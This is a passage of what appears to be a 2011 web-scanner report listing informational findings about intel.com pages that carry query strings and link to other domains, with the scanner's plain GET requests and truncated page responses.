P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:17:52 GMT
Content-Length: 26203
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
   <head>
           <title>Intel&reg; Trademarks</title>
       <meta http-equiv="C
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.147. http://www.intel.com/standards/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /standards/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/standards/index.htm?iid=subhdr+tech_stds
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /standards/index.htm?iid=subhdr+tech_stds HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35182

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<TITLE>Intel Standards &amp; Initiatives</TITLE>
   <meta name =
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.148. http://www.intel.com/support/detect.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /support/detect.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/support/detect.htm?iid=gg_support-EN_01+home_detect
The response contains the following links to other domains:
  • http://intel-drv-ws.systemrequirementslab.com/iduu/iduu_multiple/intro.aspx
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /support/detect.htm?iid=gg_support-EN_01+home_detect HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:28 GMT
Content-Length: 29864
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-US">
<head>
<!-- DOC-FACTORY Generated Tags BEGIN -->
<TITLE>Intel. Driver Update Utility</TITLE>
<meta name = "we
...[SNIP]...
<br />
               
               <iframe marginwidth="1" marginheight="1" src="http://intel-drv-ws.systemrequirementslab.com/iduu/iduu_multiple/intro.aspx" frameborder=0 border=0 width="558" scrolling="yes" height="380px"></iframe>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.149. http://www.intel.com/support/feedback.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /support/feedback.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/support/feedback.htm?iid=subhdr+res_contact
The response contains the following links to other domains:
  • http://support.dell.com/
  • http://support.gateway.com/support/default.aspx?cmpid=topnav_support
  • http://www-307.ibm.com/pc/support/site.wss/homeLenovo.do
  • http://www.acer.com/worldwide/support/index.htm
  • http://www.compaq.com/cpq-country/cpq_support.html
  • http://www.fujitsu.com/global/support/
  • http://www.hp.com/
  • http://www.ibm.com/support/uk/en/
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.intelappup.com/

Request

GET /support/feedback.htm?iid=subhdr+res_contact HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 87216

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-US">

<head>
<TITLE>Contact Intel Customer Support</TITLE>
<meta name = "description" content = "This page contain
...[SNIP]...
<strong><a href="http://www.acer.com/worldwide/support/index.htm" target=_blank onClick="var s='s_gs()'; waCustomLink(this,'support_links','o','wa_custom06=contact:oem:Acer&wa_eCustom26=contact:oem:Acer&wa_events=se_cust05');">Acer*</a>
...[SNIP]...
<strong><a href="http://www.compaq.com/cpq-country/cpq_support.html" target=_blank onClick="var s='s_gs()'; waCustomLink(this,'support_links','o','wa_custom06=contact:oem:Compaq&wa_eCustom26=contact:oem:Compaq&wa_events=se_cust05');">Compaq*</a>
...[SNIP]...
<strong><a href="http://support.dell.com/" target=_blank onClick="var s='s_gs()'; waCustomLink(this,'support_links','o','wa_custom06=contact:oem:Dell&wa_eCustom26=contact:oem:Dell&wa_events=se_cust05');">Dell*</a>
...[SNIP]...
<strong><a href="http://www.fujitsu.com/global/support/" target=_blank onClick="var s='s_gs()'; waCustomLink(this,'support_links','o','wa_custom06=contact:oem:Fujitsu&wa_eCustom26=contact:oem:Fujitsu&wa_events=se_cust05');">Fujitsu*</a>
...[SNIP]...
<strong><a href="http://support.gateway.com/support/default.aspx?cmpid=topnav_support" target=_blank onClick="var s='s_gs()'; waCustomLink(this,'support_links','o','wa_custom06=contact:oem:Gateway&wa_eCustom26=contact:oem:Gateway&wa_events=se_cust05');">Gateway*</a>
...[SNIP]...
<strong><a href="http://www.hp.com/#Support" target=_blank onClick="var s='s_gs()'; waCustomLink(this,'support_links','o','wa_custom06=contact:oem:HP&wa_eCustom26=contact:oem:HP&wa_events=se_cust05');">HP*</a>
...[SNIP]...
<strong><a href="http://www.ibm.com/support/uk/en/" target=_blank onClick="var s='s_gs()'; waCustomLink(this,'support_links','o','wa_custom06=contact:oem:IBM&wa_eCustom26=contact:oem:IBM&wa_events=se_cust05');">IBM*</a>
...[SNIP]...
<strong><a href="http://www-307.ibm.com/pc/support/site.wss/homeLenovo.do" target=_blank onClick="var s='s_gs()'; waCustomLink(this,'support_links','o','wa_custom06=contact:oem:Lenovo&wa_eCustom26=contact:oem:Lenovo&wa_events=se_cust05');">Lenovo*</a>
...[SNIP]...
<td class="bodycopy" colspan=2>
<a href="http://www.intelappup.com" alt="Download AppUp Client" target=_blank>Download AppUp Client</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.150. http://www.intel.com/support/idyp.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /support/idyp.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/support/idyp.htm?iid=gg_support-EN_01+home_sys_info_util
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /support/idyp.htm?iid=gg_support-EN_01+home_sys_info_util HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:28 GMT
Content-Length: 21117
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-US">
<head>
<TITLE>Identify your product</TITLE>
<meta name = "web_author_id" content = "kcoffin">
<meta name = "c
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.151. http://www.intel.com/support/resources.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /support/resources.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/support/resources.htm?iid=gg_support-EN_01+home_resources
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /support/resources.htm?iid=gg_support-EN_01+home_resources HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:28 GMT
Content-Length: 23076
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-US">
<head>
<!-- DOC-FACTORY Generated Tags BEGIN -->
<TITLE>Intel&reg; Support - Other Support Resources and Utili
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.152. http://www.intel.com/technology/architecture-silicon/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /technology/architecture-silicon/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/technology/architecture-silicon/index.htm?iid=subhdr+tech_arch
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /technology/architecture-silicon/index.htm?iid=subhdr+tech_arch HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:31 GMT
Content-Length: 28153
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Architecture &amp; Silicon Technology from Intel</titl
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.153. http://www.intel.com/technology/manufacturing/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /technology/manufacturing/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/technology/manufacturing/index.htm?iid=subhdr+tech_mfg
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /technology/manufacturing/index.htm?iid=subhdr+tech_mfg HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:32 GMT
Content-Length: 29517
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Intel Manufacturing</title>
<!-- DOC-FACTORY Gene
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.154. http://www.intel.com/technology/product/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /technology/product/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/technology/product/index.htm?iid=subhdr+tech_prodtech
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /technology/product/index.htm?iid=subhdr+tech_prodtech HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; 